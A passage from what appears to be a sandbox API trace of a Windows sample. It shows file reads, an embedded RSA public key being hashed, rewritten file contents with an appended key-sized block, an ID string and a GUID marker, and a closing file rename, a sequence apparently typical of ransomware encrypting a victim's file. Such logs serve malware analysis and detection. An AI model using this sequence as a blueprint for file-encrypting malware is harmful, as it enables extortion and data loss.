lpFileSize=0x30ffb40*=13742) returned 1 [0184.631] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.634] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.634] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.636] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.636] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.636] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x35ae, lpOverlapped=0x0) returned 1 [0184.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.637] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.637] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.638] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.638] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.638] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.638] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.638] GetLastError () returned 0x0 [0184.638] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.638] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.639] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.639] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.639] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x35b0) returned 0x2d43778 [0184.639] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d314e0 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e960 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31528 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9c0 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.640] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.640] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9c0 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e9a8 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.642] GetCurrentThreadId () returned 0x264 [0184.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36d48 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.643] GetCurrentThreadId () returned 0x264 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4ea08 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9a8 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9c0 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e990 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea20 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9f0 [0184.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e9d8 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4ea38 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9d8 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9f0 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e9a8 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea08 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea38 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9a8 | out: hHeap=0x6a0000) returned 1 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9d8 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4ea20 | out: hHeap=0x6a0000) returned 1 [0184.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e9c0 | out: hHeap=0x6a0000) returned 1 [0184.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e990 | out: hHeap=0x6a0000) returned 1 [0184.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31528 | out: hHeap=0x6a0000) returned 1 [0184.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.654] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x35a9, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x35a9, lpOverlapped=0x0) returned 1 [0184.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.655] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x35ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.655] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.657] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.657] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.657] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.657] CloseHandle (hObject=0x584) returned 1 [0184.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0184.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0184.659] MoveFileW 